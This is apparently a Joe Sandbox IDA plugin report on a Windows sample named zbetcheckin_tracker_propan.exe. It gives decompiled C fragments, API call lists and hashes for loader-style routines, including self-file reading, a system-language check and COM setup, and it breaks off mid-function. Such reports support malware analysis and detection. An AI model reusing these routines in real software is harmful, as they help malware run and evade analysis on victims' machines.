Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AllocVirtual
String ID: !$&$-
API String ID: 4275171209-2636402241
Opcode ID: 9e1fbba10aa5e94795f5f7174e160fc96360cf60b5177d4bc5ecc1fea85b5657
Instruction ID: e0a633122d212c40b604d23b0a668ecc6ddbcc564ff0935ed251309ee6c2b0e4
Opcode Fuzzy Hash: 9e1fbba10aa5e94795f5f7174e160fc96360cf60b5177d4bc5ecc1fea85b5657
Instruction Fuzzy Hash: 9E41F275E042688FDB24CFA8DC84BEDBBB1AF49304F0481E9E448A7345D6745A88CF29

Function 00401DFD, Relevance: 6.1, APIs: 4, Instructions: 69
file

C-Code - Quality: 85%

			E00401DFD(void* __ebx, void* __ecx, void* __edi, void* _a4) {
				CHAR* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void _v20;
				void* _t16;
				void* _t22;
				long _t23;
				int _t27;
				long _t31;

				_v12 = 0;
				_t16 = E00402685(__ecx, __edi,  &_v8, 0); // executed
				if(_t16 != 0) {
					L11:
					return _v12;
				}
				_push(0);
				_push(_a4);
				_push(__edi); // executed
				"j,h@A@"(); // executed
				if(_t16 == 0) {
					L10:
					E0040105B(_v8);
					goto L11;
				}
				_t31 = E00402B1E(__edi, __ecx, _t16 - __edi);
				if(_t31 != 0) {
					_t22 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_a4 = _t22;
					if(_t22 != 0xffffffff) {
						_t23 = SetFilePointer(_t22, _t31, 0, 0); // executed
						if(_t23 == _t31) {
							_t27 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
							if(_t27 != 0 && _v16 == 4) {
								_v12 = _v20 + __edi;
							}
						}
						CloseHandle(_a4);
					}
				}
				goto L10;
			}

0x00401e0c
0x00401e0f
0x00401e16
0x00401ea2
0x00401ea7
0x00401ea7
0x00401e1c
0x00401e1d
0x00401e20
0x00401e21
0x00401e28
0x00401e9a
0x00401e9d
0x00000000
0x00401e9d
0x00401e35
0x00401e39
0x00401e4e
0x00401e57
0x00401e5a
0x00401e60
0x00401e68
0x00401e78
0x00401e80
0x00401e8d
0x00401e8d
0x00401e80
0x00401e93
0x00401e93
0x00401e5a
0x00000000

APIs

Part of subcall function 00402685: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026AB
Part of subcall function 00402685: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026B3
Part of subcall function 00402685: GetLastError.KERNEL32(?,?,00401C28,?,00000001,767F1218,00000000,?,?,?,?,00401196,?,00000000), ref: 004026F1

Part of subcall function 004029CC: lstrcmpA.KERNEL32(?,?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402A9A
Part of subcall function 004029CC: lstrlenA.KERNEL32(?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402AA5

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401E4E
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040133F,LdrLoadDll), ref: 00401E60
ReadFile.KERNEL32 ref: 00401E78
CloseHandle.KERNEL32 ref: 00401E93

Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
String ID:
API String ID: 846255529-0
Opcode ID: 7cd500dd162e9791686f5f95744faff107afc67e854dc290e62b29d2c5798e89
Instruction ID: 548c3f1f3fb7db819cab90cac91c881d4ce4814ddec138ff16a6531c9e924b4a
Opcode Fuzzy Hash: 7cd500dd162e9791686f5f95744faff107afc67e854dc290e62b29d2c5798e89
Instruction Fuzzy Hash: 21118EB1A00118BADB20AFA5CD89EAF7E7DEF41794F104036FA05F61E0C3749E40C6A8

Function 0040F3DA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe,00000104), ref: 0040F404

Part of subcall function 00411099: Sleep.KERNEL32(00000000), ref: 004110B6

Strings

C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe, xrefs: 0040F3F7, 0040F3FC
h,_, xrefs: 0040F40A

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: FileModuleNameSleep
String ID: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe$h,_
API String ID: 4084727719-301230119
Opcode ID: f721bb1b8912cc00147c7dbf815b772de8ddca877d5da806554e0ba7126dc6b1
Instruction ID: f7f7e859044ada10db05f7afe2aa83ef5da452e730da1612489c00f235542acb
Opcode Fuzzy Hash: f721bb1b8912cc00147c7dbf815b772de8ddca877d5da806554e0ba7126dc6b1
Instruction Fuzzy Hash: B411D571D00109BFCB20DFB9AC818DF7BB9EA55328761867BE915E32D0D2345A49CB98

Function 0040F3DA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70

C-Code - Quality: 96%

			E0040F3DA(void* __ecx) {
				CHAR* _v8;
				signed int _v12;
				char _v16;
				void* __edi;
				intOrPtr* _t14;
				signed int _t17;
				char _t27;
				void* _t28;
				signed int _t37;
				intOrPtr _t41;

				_t26 = __ecx;
				_t41 =  *0x436c0c; // 0x1
				if(_t41 == 0) {
					E0041051A(__ecx);
				}
				 *0x43663c = 0; // executed
				GetModuleFileNameA(0, 0x436538, 0x104);
				_t14 =  *0x436c14; // 0x5f2c68
				 *0x4360ac = 0x436538;
				if(_t14 == 0) {
					L4:
					_v8 = 0x436538;
					goto L5;
				} else {
					_v8 = _t14;
					if( *_t14 != 0) {
						L5:
						E0040F242(_t26, _v8,  &_v16, 0, 0,  &_v12);
						_t17 = _v12;
						if(_t17 >= 0x3fffffff) {
							L10:
							return _t17 | 0xffffffff;
						}
						_t27 = _v16;
						if(_t27 >= 0xffffffff) {
							goto L10;
						}
						_t33 = _t17 << 2;
						_t17 = (_t17 << 2) + _t27;
						if(_t17 < _t27) {
							goto L10;
						}
						_t17 = E00411099(_t17);
						_t37 = _t17;
						_pop(_t28);
						if(_t37 == 0) {
							goto L10;
						}
						E0040F242(_t28, _v8,  &_v16, _t37, _t33 + _t37,  &_v12);
						 *0x436090 = _v12 - 1;
						 *0x436094 = _t37;
						return 0;
					}
					goto L4;
				}
			}

0x0040f3da
0x0040f3e3
0x0040f3eb
0x0040f3ed
0x0040f3ed
0x0040f3fe
0x0040f404
0x0040f40a
0x0040f411
0x0040f417
0x0040f420
0x0040f420
0x00000000
0x0040f419
0x0040f41b
0x0040f41e
0x0040f423
0x0040f42f
0x0040f434
0x0040f43f
0x0040f48b
0x00000000
0x0040f48b
0x0040f441
0x0040f447
0x00000000
0x00000000
0x0040f44b
0x0040f44e
0x0040f453
0x00000000
0x00000000
0x0040f456
0x0040f45b
0x0040f45f
0x0040f460
0x00000000
0x00000000
0x0040f470
0x0040f47c
0x0040f481
0x00000000
0x0040f487
0x00000000
0x0040f41e

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe,00000104), ref: 0040F404

Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6

Strings

h,_, xrefs: 0040F40A
C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe, xrefs: 0040F3F7, 0040F3FC

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: FileModuleNameSleep
String ID: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe$h,_
API String ID: 4084727719-301230119
Opcode ID: 6bd42cb492e30777a8f82e1ac3e7892b6374d7cdf348f580bf185e2720185fdf
Instruction ID: f7f7e859044ada10db05f7afe2aa83ef5da452e730da1612489c00f235542acb
Opcode Fuzzy Hash: 6bd42cb492e30777a8f82e1ac3e7892b6374d7cdf348f580bf185e2720185fdf
Instruction Fuzzy Hash: B411D571D00109BFCB20DFB9AC818DF7BB9EA55328761867BE915E32D0D2345A49CB98

Function 002D1BB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53memory

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,002DA05C), ref: 002D1BCA

Part of subcall function 002D4BFE: memcpy.NTDLL(00000000,00000084,00000084,?,00000000,00000008,?,?,002D1BFC,?,?,?,002D1DF2,00000002,?,?), ref: 002D4C20
Part of subcall function 002D4BFE: memset.NTDLL ref: 002D4C53
Part of subcall function 002D4BFE: memcpy.NTDLL(?,?,00000000,00000000,?,?,00000000), ref: 002D4C6D

Part of subcall function 002D482D: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4836
Part of subcall function 002D482D: Sleep.KERNEL32(0000000A,?,002D1DF2,00000002,?,?), ref: 002D4840
Part of subcall function 002D482D: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4873

HeapFree.KERNEL32(00000000,?,002DB2D0), ref: 002D1C21

Part of subcall function 002D4D19: GetTickCount.KERNEL32(002DA05C,00000000,00000000), ref: 002D4D30
Part of subcall function 002D4D19: RtlQueryPerformanceFrequency.NTDLL(?), ref: 002D4D81
Part of subcall function 002D4D19: RtlQueryPerformanceCounter.NTDLL(?), ref: 002D4D8B
Part of subcall function 002D4D19: _aulldiv.NTDLL(?,?,?,?), ref: 002D4D9D
Part of subcall function 002D4D19: GetSystemTimeAsFileTime.KERNELBASE(?), ref: 002D4DB7
Part of subcall function 002D4D19: _aulldiv.NTDLL(?,?,00989680,00000000), ref: 002D4DD7
Part of subcall function 002D4D19: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 002D4E54
Part of subcall function 002D4D19: GetTickCount.KERNELBASE ref: 002D4E65
Part of subcall function 002D4D19: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4E79
Part of subcall function 002D4D19: RtlLeaveCriticalSection.NTDLL(002DB29C), ref: 002D4E97
Part of subcall function 002D4D19: StrTrimA.SHLWAPI(00000000,002DA294), ref: 002D4ECC
Part of subcall function 002D4D19: lstrcpy.KERNEL32(?,?), ref: 002D4EEC
Part of subcall function 002D4D19: wcstombs.NTDLL ref: 002D4F96
Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,00000008,?), ref: 002D4FED
Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002D4FFE
Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,?,00000001), ref: 002D500E
Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,?), ref: 002D501E
Part of subcall function 002D4D19: HeapFree.KERNEL32(00000000,00000001), ref: 002D502C

Strings

Fv, xrefs: 002D1BCA

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$Free$CriticalSection$AllocateCountEnterLeavePerformanceQueryTickTime_aulldivmemcpy$CounterFileFrequencySleepSystemTrimlstrcpymemsetwcstombs
String ID: Fv
API String ID: 3347454254-1370784869
Opcode ID: d04ba21adcbe012530ab9cb60ebecd086e4d42c76dbbaaa938fd51d66a594b12
Instruction ID: 07395057b0d20c927a6c6c7ed35a3806e64e4db320c42104d19ac9dbf6bff492
Opcode Fuzzy Hash: d04ba21adcbe012530ab9cb60ebecd086e4d42c76dbbaaa938fd51d66a594b12
Instruction Fuzzy Hash: 47019272620209FBD7019F55EC89F9A3B6CEB48758F100027F905D6360D771ED209BA0

Function 0040FBFF, Relevance: 4.6, APIs: 3, Instructions: 109memorythread

APIs

GetModuleHandleA.KERNEL32(0041804C), ref: 0040FC05
TlsAlloc.KERNEL32 ref: 0040FC9E

Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(0041804C,?,0040F8BA,00000000,00412290), ref: 0040F889
Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,0041803C,?,0040F8BA,00000000,00412290), ref: 0040F899
Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,0040F8BA,00000000,00412290), ref: 0040F8A7

GetCurrentThreadId.KERNEL32 ref: 0040FD68

Part of subcall function 0040F952: TlsFree.KERNEL32(0042C494), ref: 0040F97D

Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913

Part of subcall function 004110D9: Sleep.KERNEL32(00000000), ref: 004110FE

Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(0041804C,?,?,0040EFA6), ref: 0040F9A0
Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: HandleModule$AddressPointerProc$AllocCurrentDecodeEncodeFreeIncrementInterlockedSleepThread
String ID:
API String ID: 3963488467-0
Opcode ID: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
Instruction ID: f4645d5930c4b6cfba22fa347c7c0f035c91bb1ae7631caf77b4e8b584b8dd61
Opcode Fuzzy Hash: 585ddeddb7b52054c9609b37b0de9c137685ef3b7ec3faa75b0f07d8c7479e08
Instruction Fuzzy Hash: 06319172900702BAD731BF75AC07A563FA1AB05794B22953FE804A26F0EB38D4488F5C

Function 002D23AB, Relevance: 4.6, APIs: 3, Instructions: 92memory

APIs

SysAllocString.OLEAUT32(00000000), ref: 002D2435
SysFreeString.OLEAUT32(00000000), ref: 002D2449
SysFreeString.OLEAUT32(?), ref: 002D2457

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: eaf4fffeef193439b6c2299397d3c56f6303675bd231b8611a8a8a59d4a50f1b
Instruction ID: fe3d54f4e6fb8138b7d2cfedb2c0d97c8cd8d7a66ffc4ea903945d5a4e272877
Opcode Fuzzy Hash: eaf4fffeef193439b6c2299397d3c56f6303675bd231b8611a8a8a59d4a50f1b
Instruction Fuzzy Hash: 3131127191024AEFCB01DF98D8848AEBBB5FF54341B21842BF90597310D7759D59CFA2

Function 00402685, Relevance: 4.6, APIs: 3, Instructions: 53

APIs

Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052

GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026AB
GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026B3
GetLastError.KERNEL32(?,?,00401C28,?,00000001,767F1218,00000000,?,?,?,?,00401196,?,00000000), ref: 004026F1

Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: FileHeapModuleName$AllocErrorFreeLast
String ID:
API String ID: 2988868759-0
Opcode ID: e04f2cda87d63690c36d13c71f808de2bff031073c5f079bca8e35168d11a7df
Instruction ID: 38005211e0c518f31a1dce85c31ae3552b31d11fcf6732a8a56490fa6ec46b04
Opcode Fuzzy Hash: e04f2cda87d63690c36d13c71f808de2bff031073c5f079bca8e35168d11a7df
Instruction Fuzzy Hash: 8A014C72900115EBC7316BA98E8CA9F7668AFC1754F150037FA45B72D0EAFDDC8087A9

Function 002D26CC, Relevance: 4.5, APIs: 3, Instructions: 49

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,002DCA98), ref: 002D26F4
memcpy.NTDLL(?,002D1C97,00000008), ref: 002D270E

Part of subcall function 002D2495: SysFreeString.OLEAUT32(002DCA98,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D256C
Part of subcall function 002D2495: SysFreeString.OLEAUT32(00000000,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D2576

SafeArrayDestroy.OLEAUT32(002D1DB8), ref: 002D273A

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ArrayFreeSafeString$CreateDestroymemcpy
String ID:
API String ID: 3778694329-0
Opcode ID: 99a601b4c8da7c9dae826a9bc93fed9034ec57e892401271f1f134c189d53dd8
Instruction ID: 6ffeef676b6a81e761557bded5ce0154f3412f1965718a7c28ad8e2734627bac
Opcode Fuzzy Hash: 99a601b4c8da7c9dae826a9bc93fed9034ec57e892401271f1f134c189d53dd8
Instruction Fuzzy Hash: 13014072D10209BFDF119F95DC09ADEBBB9AF14751F108026FA00F6161E3B58E25DB91

Function 00401070, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48
memory

C-Code - Quality: 86%

			E00401070(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				signed int _t8;
				signed short _t15;
				char* _t18;
				signed int _t19;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t8 =  *0x405498; // 0x736c6e70
				_t25 = 0;
				if(E0040286F(__ecx,  &_v8,  &_v12, _t8 ^ 0x096844fa) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t19 =  *0x405498; // 0x736c6e70
						_t29 = E00402985(_t22, _v8, _t19 ^ 0x7e4c4e4c);
					}
					if(_t29 != 0) {
						_t15 = E0040270C(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x405440, 0, _v8);
				}
				return _t25;
			}

0x00401070
0x00401073
0x00401074
0x00401075
0x0040108a
0x00401093
0x00401098
0x004010b1
0x0040109a
0x0040109a
0x004010ad
0x004010ad
0x004010b5
0x004010b7
0x004010bf
0x004010c7
0x004010cf
0x004010d1
0x004010d1
0x004010cf
0x004010e1
0x004010e1
0x004010ec

APIs

Part of subcall function 0040286F: memcpy.NTDLL(00000000,?,?,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 0040294D

HeapFree.KERNEL32(00000000,?,?), ref: 004010E1

Part of subcall function 0040270C: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 00402721
Part of subcall function 0040270C: GetSystemDefaultUILanguage.KERNEL32(?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178,?,00000000), ref: 0040272B
Part of subcall function 0040270C: VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,004010BC,?,?,736C6E70,767F1218,0000000C,?,?,?,00401178), ref: 0040273E

StrStrIA.SHLWAPI(00000000,?), ref: 004010C7

Strings

pnls, xrefs: 00401075, 0040109A

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Language$DefaultFreeHeapInfoLocaleNameSystemmemcpy
String ID: pnls
API String ID: 2738416249-141991303
Opcode ID: ee47c91df59879e778880c43149430aba9283b5028a08547e3f01ce58f7cf177
Instruction ID: 7ec153cab36ba7075c7ba79943ca731c69473343181f2da809a5a451285e1415
Opcode Fuzzy Hash: ee47c91df59879e778880c43149430aba9283b5028a08547e3f01ce58f7cf177
Instruction Fuzzy Hash: BC01D476A00104ABC711DB92DE44EDF77ACEB84301F110137BA01F3290DA75DA408AA8

Function 0040F850, Relevance: 4.5, APIs: 3, Instructions: 32libraryloader

APIs

GetModuleHandleA.KERNEL32(0041804C,?,0040F8BA,00000000,00412290), ref: 0040F889
GetProcAddress.KERNEL32(00000000,0041803C,?,0040F8BA,00000000,00412290), ref: 0040F899
RtlEncodePointer.NTDLL(?,?,0040F8BA,00000000,00412290), ref: 0040F8A7

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressEncodeHandleModulePointerProc
String ID:
API String ID: 1192658864-0
Opcode ID: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
Instruction ID: 213b198e5dd7e5a30d12bdbf8ad6a886c508e8041afcaa9b888406e698b6a230
Opcode Fuzzy Hash: e1a1faa33349261d61b007e91c188944f8f97be2cb1367989c561306ed197f4b
Instruction Fuzzy Hash: BDF054326042129EDA24FB35DC44EEB3EA4AF083947558476B818E2AF1DB38CC46CA5C

Function 0040F8BC, Relevance: 4.5, APIs: 3, Instructions: 32libraryloader

APIs

GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressDecodeHandleModulePointerProc
String ID:
API String ID: 727757147-0
Opcode ID: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
Instruction ID: b9744975f3327fb948e758a7dae8ca83f05080644b539119d46011b4a90124de
Opcode Fuzzy Hash: 9749bbe704b7cb80d8c031ef03dc7bf9db3eea0e1109e80d9884c7ba75715e9f
Instruction Fuzzy Hash: 81F05430604312AED730AB35EC54BAB3EA4AF443507148436B408E26F2CB38DC499A9C

Function 002D2495, Relevance: 3.1, APIs: 2, Instructions: 110

APIs

Part of subcall function 002D23AB: SysAllocString.OLEAUT32(00000000), ref: 002D2435
Part of subcall function 002D23AB: SysFreeString.OLEAUT32(00000000), ref: 002D2449
Part of subcall function 002D23AB: SysFreeString.OLEAUT32(?), ref: 002D2457

SysFreeString.OLEAUT32(002DCA98,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D256C
SysFreeString.OLEAUT32(00000000,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D2576

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 8472e39e88c147e309a0eed49ed0a76ec6b885cdf2cb21149ebd1cdff01d31bf
Instruction ID: 8bd109226bd48074fda4831a9d6dd017da6df5cb8c4748974daced30ec2ab3ca
Opcode Fuzzy Hash: 8472e39e88c147e309a0eed49ed0a76ec6b885cdf2cb21149ebd1cdff01d31bf
Instruction Fuzzy Hash: B9317772900109EFCB25DF68D898C9BBB79EBD97407108599FC159B210D232DD61CBA0

Function 002D22E8, Relevance: 3.1, APIs: 2, Instructions: 61com

APIs

CoCreateInstance.OLE32(002DC0BC,00000000,00000001,002DC0CC,002D1DB8), ref: 002D2302
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 002D2339

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: BlanketCreateInstanceProxy
String ID:
API String ID: 1899829610-0
Opcode ID: c31a2e0389df4e051e539ac2bd3c72f11366b752440e79e761c47549ee7a0cfd
Instruction ID: 6fd363ccc26608ebff2c8a4a88422e31d94ad1eed726fcc7b1343f48307fb936
Opcode Fuzzy Hash: c31a2e0389df4e051e539ac2bd3c72f11366b752440e79e761c47549ee7a0cfd
Instruction Fuzzy Hash: 1C015B75611224FBC7109B65CC5DD9F7F6DEB8ABA0F140496F50ADB340DA71AE02CAA0

Function 00411650, Relevance: 3.1, APIs: 2, Instructions: 51libraryloader

APIs

Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913

GetModuleHandleA.KERNELBASE(00418144), ref: 00411699
GetProcAddress.KERNELBASE(00000000,0041811C), ref: 004116A9

Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(0041804C,?,0040F8BA,00000000,00412290), ref: 0040F889
Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,0041803C,?,0040F8BA,00000000,00412290), ref: 0040F899
Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,0040F8BA,00000000,00412290), ref: 0040F8A7

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressHandleModuleProc$Pointer$DecodeEncode
String ID:
API String ID: 1393985791-0
Opcode ID: 3fa38c983e5ae4e21be3749140712afe6d2bcf6475972416b5a03ab484b2e32f
Instruction ID: 10b67c62758283e54975a8c2a8718c2afbb13bd149e7d6db9f50ab6a7734c4d0
Opcode Fuzzy Hash: 3fa38c983e5ae4e21be3749140712afe6d2bcf6475972416b5a03ab484b2e32f
Instruction Fuzzy Hash: 3901D872D00215ABCB21BF75DC459DE7A71AB44310715827BF515B33B1EB3D49818A6C

Function 002D4C8B, Relevance: 3.0, APIs: 2, Instructions: 49

APIs

GetVersionExA.KERNEL32(?), ref: 002D4CA4

Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C

wsprintfA.USER32 ref: 002D4D08

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AllocateHeapVersionwsprintf
String ID:
API String ID: 3641471311-0
Opcode ID: aed26a8e293177467a26cfe96790f5e91725b4afc31d5627b97530e9127c776b
Instruction ID: c5f75fa170ef4224398aa446529959f1be753088f49b7b31e76e1982b21cb124
Opcode Fuzzy Hash: aed26a8e293177467a26cfe96790f5e91725b4afc31d5627b97530e9127c776b
Instruction Fuzzy Hash: 5901C472D1122ADBDF11AFA4DC05AFE77F4BB08306F14011AF910E6241E3388D248BA0

Function 00401C0F, Relevance: 3.0, APIs: 2, Instructions: 46

C-Code - Quality: 38%

			E00401C0F(void* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _t8;
				void* _t10;
				signed int _t12;
				signed int _t17;
				intOrPtr* _t21;
				void* _t24;

				_push(__ecx);
				_push(__ecx);
				_t8 = E00402685(__ecx,  *0x405484,  &_v8, 1); // executed
				_v12 = _t8;
				if(_t8 != 0) {
